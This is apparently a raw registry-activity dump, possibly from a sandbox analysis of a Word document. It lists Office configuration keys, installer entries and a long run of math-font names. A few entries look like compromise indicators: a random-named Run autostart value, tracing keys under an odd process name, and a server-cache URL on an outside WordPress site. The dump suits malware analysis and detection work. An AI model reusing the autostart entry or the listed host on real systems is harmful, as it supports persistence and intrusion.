HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2F350
2F350
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
2?7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
3?7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PROMZwFp385vXrN_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
PMoZbw
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
PMoZbw
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
e+2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
*-2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
0/2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://pzsrblog.com/wp-content/uploads/2012/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6BAC7
6BAC7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
